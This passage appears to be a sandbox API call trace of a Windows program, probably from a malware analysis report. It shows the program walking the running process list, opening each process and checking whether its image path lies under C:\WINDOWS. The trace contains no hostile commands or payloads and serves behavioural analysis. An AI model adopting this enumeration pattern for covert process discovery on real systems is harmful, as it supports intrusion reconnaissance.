(dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x2b4) returned 0x0 [0070.564] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.564] GetCurrentProcessId () returned 0xf00 [0070.564] GetCurrentProcess () returned 0xffffffff [0070.564] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.564] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0070.564] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0070.565] GetCurrentProcessId () returned 0xf00 [0070.565] GetCurrentProcess () returned 0xffffffff [0070.565] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.565] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0070.565] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.565] GetCurrentProcessId () returned 0xf00 [0070.565] GetCurrentProcess () returned 0xffffffff [0070.565] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.565] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0070.565] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.566] GetCurrentProcessId () returned 0xf00 [0070.566] GetCurrentProcess () returned 0xffffffff [0070.566] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.566] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0 [0070.566] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.566] GetCurrentProcessId () returned 0xf00 [0070.566] GetCurrentProcess () returned 0xffffffff [0070.566] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.567] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0070.567] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.567] GetCurrentProcessId () returned 0xf00 [0070.568] GetCurrentProcess () returned 0xffffffff [0070.568] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.568] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0070.568] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.568] GetCurrentProcessId () returned 0xf00 [0070.568] GetCurrentProcess () returned 0xffffffff [0070.568] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.568] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x350) returned 0x0 [0070.568] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.569] GetCurrentProcessId () returned 0xf00 [0070.569] GetCurrentProcess () returned 0xffffffff [0070.569] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.569] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x434) returned 0x0 [0070.569] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.569] GetCurrentProcessId () returned 0xf00 [0070.569] GetCurrentProcess () returned 0xffffffff [0070.569] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.569] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x554) returned 0x0 [0070.569] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.570] GetCurrentProcessId () returned 0xf00 [0070.570] GetCurrentProcess () returned 0xffffffff [0070.570] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.570] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x590) returned 0x0 [0070.570] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.570] GetCurrentProcessId () returned 0xf00 [0070.571] GetCurrentProcess () returned 0xffffffff [0070.571] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.571] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x598) returned 0x0 [0070.571] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.571] GetCurrentProcessId () returned 0xf00 [0070.571] GetCurrentProcess () returned 0xffffffff [0070.571] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.571] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5b0) returned 0x0 [0070.571] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0070.572] GetCurrentProcessId () returned 0xf00 [0070.572] GetCurrentProcess () returned 0xffffffff [0070.572] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.572] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x5e8) returned 0x0 [0070.572] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.572] GetCurrentProcessId () returned 0xf00 [0070.572] GetCurrentProcess () returned 0xffffffff [0070.572] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.572] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x69c) returned 0x0 [0070.572] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0070.573] GetCurrentProcessId () returned 0xf00 [0070.573] GetCurrentProcess () returned 0xffffffff [0070.573] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.573] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x6bc) returned 0x0 [0070.573] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0070.573] GetCurrentProcessId () returned 0xf00 [0070.573] GetCurrentProcess () returned 0xffffffff [0070.573] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.574] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x708) returned 0x434 [0070.574] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\sihost.exe" (normalized: "c:\\windows\\system32\\sihost.exe")) returned 0x1e [0070.574] StrStrIW (lpFirst="C:\\Windows\\System32\\sihost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\sihost.exe" [0070.574] CloseHandle (hObject=0x434) returned 1 [0070.574] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.575] GetCurrentProcessId () returned 0xf00 [0070.575] GetCurrentProcess () returned 0xffffffff [0070.575] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.575] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x720) returned 0x434 [0070.575] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0070.575] StrStrIW (lpFirst="C:\\Windows\\System32\\svchost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\svchost.exe" [0070.575] CloseHandle (hObject=0x434) returned 1 [0070.575] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.575] GetCurrentProcessId () returned 0xf00 [0070.575] GetCurrentProcess () returned 0xffffffff [0070.575] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.576] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x7a0) returned 0x434 [0070.576] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0070.576] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0070.576] CloseHandle (hObject=0x434) returned 1 [0070.576] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3a, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0070.576] GetCurrentProcessId () returned 0xf00 [0070.576] GetCurrentProcess () returned 0xffffffff [0070.576] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.576] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0070.577] GetCurrentProcessId () returned 0xf00 [0070.577] GetCurrentProcess () returned 0xffffffff [0070.577] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.577] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x818) returned 0x0 [0070.577] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0070.577] GetCurrentProcessId () returned 0xf00 [0070.577] GetCurrentProcess () returned 0xffffffff [0070.577] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.578] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x84c) returned 0x0 [0070.578] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0070.578] GetCurrentProcessId () returned 0xf00 [0070.578] GetCurrentProcess () returned 0xffffffff [0070.578] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.578] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x8a0) returned 0x0 [0070.578] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0070.579] GetCurrentProcessId () returned 0xf00 [0070.579] GetCurrentProcess () returned 0xffffffff [0070.579] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.579] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb3c) returned 0x434 [0070.579] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" (normalized: "c:\\windows\\systemapps\\shellexperiencehost_cw5n1h2txyewy\\shellexperiencehost.exe")) returned 0x4f [0070.579] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\ShellExperienceHost_cw5n1h2txyewy\\ShellExperienceHost.exe" [0070.579] CloseHandle (hObject=0x434) returned 1 [0070.579] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0070.580] GetCurrentProcessId () returned 0xf00 [0070.580] GetCurrentProcess () returned 0xffffffff [0070.580] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.580] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xb60) returned 0x434 [0070.580] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" (normalized: "c:\\windows\\systemapps\\microsoft.windows.cortana_cw5n1h2txyewy\\searchui.exe")) returned 0x4a [0070.580] StrStrIW (lpFirst="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\SearchUI.exe" [0070.580] CloseHandle (hObject=0x434) returned 1 [0070.580] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0070.580] GetCurrentProcessId () returned 0xf00 [0070.580] GetCurrentProcess () returned 0xffffffff [0070.580] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.580] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xbe4) returned 0x434 [0070.581] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe")) returned 0x25 [0070.581] StrStrIW (lpFirst="C:\\Windows\\System32\\RuntimeBroker.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\RuntimeBroker.exe" [0070.581] CloseHandle (hObject=0x434) returned 1 [0070.581] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0070.581] GetCurrentProcessId () returned 0xf00 [0070.581] GetCurrentProcess () returned 0xffffffff [0070.581] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.581] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0xe0c) returned 0x0 [0070.581] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0070.582] GetCurrentProcessId () returned 0xf00 [0070.582] GetCurrentProcess () returned 0xffffffff [0070.582] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.582] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1168) returned 0x0 [0070.582] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0070.633] GetCurrentProcessId () returned 0xf00 [0070.633] GetCurrentProcess () returned 0xffffffff [0070.633] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.634] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x1240) returned 0x0 [0070.634] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.634] GetCurrentProcessId () returned 0xf00 [0070.634] GetCurrentProcess () returned 0xffffffff [0070.634] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.634] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12d4) returned 0x434 [0070.634] GetModuleFileNameExW (in: hProcess=0x434, hModule=0x0, lpFilename=0x2eef9f4, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")) returned 0x21 [0070.634] StrStrIW (lpFirst="C:\\Windows\\System32\\taskhostw.exe", lpSrch="C:\\WINDOWS") returned="C:\\Windows\\System32\\taskhostw.exe" [0070.635] CloseHandle (hObject=0x434) returned 1 [0070.635] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0070.635] GetCurrentProcessId () returned 0xf00 [0070.635] GetCurrentProcess () returned 0xffffffff [0070.635] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.635] OpenProcess (dwDesiredAccess=0x10043a, bInheritHandle=0, dwProcessId=0x12dc) returned 0x0 [0070.635] Process32NextW (in: hSnapshot=0x430, lppe=0x2eefc1c | out: lppe=0x2eefc1c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0070.636] GetCurrentProcessId () returned 0xf00 [0070.636] GetCurrentProcess () returned 0xffffffff [0070.636] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x0, ProcessInformation=0x2eefe48, ProcessInformationLength=0x18, ReturnLength=0x2eefe60 | out: ProcessInformation=0x2eefe48, ReturnLength=0x2eefe60) returned 0x0 [0070.636] OpenProcess 